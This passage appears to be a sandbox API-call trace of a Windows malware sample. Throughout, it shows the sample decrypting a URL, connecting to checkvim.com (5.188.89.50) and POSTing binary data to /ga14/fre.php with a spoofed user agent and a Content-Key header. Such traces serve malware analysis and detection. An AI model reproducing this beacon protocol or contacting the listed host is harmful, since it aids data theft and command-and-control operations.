0x76f60000 [0272.265] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0272.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0272.266] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0272.266] GetProcessHeap () returned 0x840000 [0272.266] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0272.266] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0272.268] GetProcessHeap () returned 0x840000 [0272.268] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c08 [0272.268] socket (af=2, type=1, protocol=6) returned 0x408 [0272.269] connect (s=0x408, name=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0272.337] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0272.337] GetProcessHeap () returned 0x840000 [0272.337] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fa40 [0272.337] GetProcessHeap () returned 0x840000 [0272.337] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0272.338] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0272.339] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0272.339] GetProcessHeap () returned 0x840000 [0272.339] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0272.339] GetProcessHeap () returned 0x840000 [0272.339] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0272.339] GetProcessHeap () returned 0x840000 [0272.339] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f758 [0272.339] GetProcessHeap () returned 0x840000 [0272.339] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0272.340] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0272.341] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0272.341] GetProcessHeap () returned 0x840000 [0272.341] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0272.341] GetProcessHeap () returned 0x840000 [0272.341] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0272.341] send (s=0x408, buf=0x873a58*, len=237, flags=0) returned 237 [0272.343] send (s=0x408, buf=0x87eb58*, len=159, flags=0) returned 159 [0272.343] GetProcessHeap () returned 0x840000 [0272.344] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0272.344] recv (in: s=0x408, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0272.704] GetProcessHeap () returned 0x840000 [0272.704] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0272.705] GetProcessHeap () returned 0x840000 [0272.705] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0272.705] GetProcessHeap () returned 0x840000 [0272.705] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0272.705] GetProcessHeap () returned 0x840000 [0272.705] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fa40 | out: hHeap=0x840000) returned 1 [0272.705] closesocket (s=0x408) returned 0 [0272.705] GetProcessHeap () returned 0x840000 [0272.705] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c08 | out: hHeap=0x840000) returned 1 [0272.705] GetProcessHeap () returned 0x840000 [0272.706] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0272.706] GetProcessHeap () returned 0x840000 [0272.706] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fe18 | out: hHeap=0x840000) returned 1 [0272.706] GetProcessHeap () returned 0x840000 [0272.706] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0272.706] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x14c) returned 0x408 [0272.708] Sleep (dwMilliseconds=0xea60) [0272.710] GetProcessHeap () returned 0x840000 [0272.710] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0272.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.711] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0272.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.717] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0272.725] GetProcessHeap () returned 0x840000 [0272.725] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0272.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.727] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e630) returned 1 [0272.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.728] CryptSetKeyParam (hKey=0x87e630, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0272.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.740] CryptSetKeyParam (hKey=0x87e630, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.741] GetProcessHeap () returned 0x840000 [0272.741] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0272.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.742] CryptDecrypt (in: hKey=0x87e630, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0272.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.743] CryptDestroyKey (hKey=0x87e630) returned 1 [0272.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.744] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0272.744] GetProcessHeap () returned 0x840000 [0272.744] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0272.745] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0272.745] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0272.746] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0272.747] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0272.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0272.748] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0272.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0272.749] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0272.749] GetProcessHeap () returned 0x840000 [0272.749] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0272.749] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0272.749] GetProcessHeap () returned 0x840000 [0272.749] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0272.749] GetProcessHeap () returned 0x840000 [0272.749] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0272.750] GetProcessHeap () returned 0x840000 [0272.750] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0272.750] GetProcessHeap () returned 0x840000 [0272.750] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fbd8 [0272.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.751] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0272.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.757] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0272.765] GetProcessHeap () returned 0x840000 [0272.765] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0272.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.766] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2f0) returned 1 [0272.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.769] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0272.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.771] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.771] GetProcessHeap () returned 0x840000 [0272.771] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0272.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.773] CryptDecrypt (in: hKey=0x87e2f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fbd8, pdwDataLen=0x19f9a4 | out: pbData=0x87fbd8, pdwDataLen=0x19f9a4) returned 1 [0272.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.774] CryptDestroyKey (hKey=0x87e2f0) returned 1 [0272.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.775] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0272.775] GetProcessHeap () returned 0x840000 [0272.775] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0272.776] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0272.776] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0272.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0272.779] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0272.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0272.780] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0272.780] GetProcessHeap () returned 0x840000 [0272.780] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871268 [0272.780] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0272.782] GetProcessHeap () returned 0x840000 [0272.782] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0272.782] socket (af=2, type=1, protocol=6) returned 0x40c [0272.782] connect (s=0x40c, name=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0272.872] FreeAddrInfoW (pAddrInfo=0x8713d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0272.872] GetProcessHeap () returned 0x840000 [0272.872] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0272.872] GetProcessHeap () returned 0x840000 [0272.872] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0272.872] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0272.873] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0272.873] GetProcessHeap () returned 0x840000 [0272.873] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0272.873] GetProcessHeap () returned 0x840000 [0272.873] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0272.873] GetProcessHeap () returned 0x840000 [0272.873] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f7e8 [0272.873] GetProcessHeap () returned 0x840000 [0272.873] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0272.874] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0272.874] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0272.875] GetProcessHeap () returned 0x840000 [0272.875] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0272.875] GetProcessHeap () returned 0x840000 [0272.875] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0272.875] send (s=0x40c, buf=0x873a58*, len=237, flags=0) returned 237 [0272.876] send (s=0x40c, buf=0x87eb58*, len=159, flags=0) returned 159 [0272.876] GetProcessHeap () returned 0x840000 [0272.876] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0272.876] recv (in: s=0x40c, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0273.215] GetProcessHeap () returned 0x840000 [0273.215] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0273.216] GetProcessHeap () returned 0x840000 [0273.216] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7e8 | out: hHeap=0x840000) returned 1 [0273.216] GetProcessHeap () returned 0x840000 [0273.216] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0273.216] GetProcessHeap () returned 0x840000 [0273.216] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0273.216] closesocket (s=0x40c) returned 0 [0273.216] GetProcessHeap () returned 0x840000 [0273.216] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0273.217] GetProcessHeap () returned 0x840000 [0273.217] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0273.217] GetProcessHeap () returned 0x840000 [0273.217] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fbd8 | out: hHeap=0x840000) returned 1 [0273.217] GetProcessHeap () returned 0x840000 [0273.217] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871268 | out: hHeap=0x840000) returned 1 [0273.217] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1180) returned 0x40c [0273.219] Sleep (dwMilliseconds=0xea60) [0273.221] GetProcessHeap () returned 0x840000 [0273.221] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f878 [0273.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.222] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0273.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.237] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f930) returned 1 [0273.280] GetProcessHeap () returned 0x840000 [0273.280] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0273.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.281] CryptImportKey (in: hProv=0x86f930, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0273.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.292] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0273.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.294] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0273.294] GetProcessHeap () returned 0x840000 [0273.294] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0273.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.295] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f878, pdwDataLen=0x19f9a4 | out: pbData=0x87f878, pdwDataLen=0x19f9a4) returned 1 [0273.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.296] CryptDestroyKey (hKey=0x87e270) returned 1 [0273.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.297] CryptReleaseContext (hProv=0x86f930, dwFlags=0x0) returned 1 [0273.297] GetProcessHeap () returned 0x840000 [0273.297] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0273.298] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0273.298] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0273.299] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0273.299] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0273.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0273.301] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0273.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0273.302] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0273.302] GetProcessHeap () returned 0x840000 [0273.302] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0273.302] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0273.303] GetProcessHeap () returned 0x840000 [0273.303] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0273.303] GetProcessHeap () returned 0x840000 [0273.303] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0273.303] GetProcessHeap () returned 0x840000 [0273.303] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f878 | out: hHeap=0x840000) returned 1 [0273.303] GetProcessHeap () returned 0x840000 [0273.303] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb00 [0273.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.304] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0273.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.311] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0273.320] GetProcessHeap () returned 0x840000 [0273.320] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0273.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.322] CryptImportKey (in: hProv=0x86f248, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e730) returned 1 [0273.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.323] CryptSetKeyParam (hKey=0x87e730, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0273.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.324] CryptSetKeyParam (hKey=0x87e730, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0273.324] GetProcessHeap () returned 0x840000 [0273.324] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0273.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.325] CryptDecrypt (in: hKey=0x87e730, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb00, pdwDataLen=0x19f9a4 | out: pbData=0x87fb00, pdwDataLen=0x19f9a4) returned 1 [0273.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.326] CryptDestroyKey (hKey=0x87e730) returned 1 [0273.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.328] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0273.328] GetProcessHeap () returned 0x840000 [0273.328] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0273.328] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0273.329] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0273.330] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0273.330] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0273.331] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0273.331] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0273.331] GetProcessHeap () returned 0x840000 [0273.331] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0273.331] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0273.333] GetProcessHeap () returned 0x840000 [0273.333] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871ca8 [0273.333] socket (af=2, type=1, protocol=6) returned 0x410 [0273.333] connect (s=0x410, name=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0273.403] FreeAddrInfoW (pAddrInfo=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0273.403] GetProcessHeap () returned 0x840000 [0273.403] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fa40 [0273.403] GetProcessHeap () returned 0x840000 [0273.403] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0273.404] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0273.405] wvsprintfA (in: 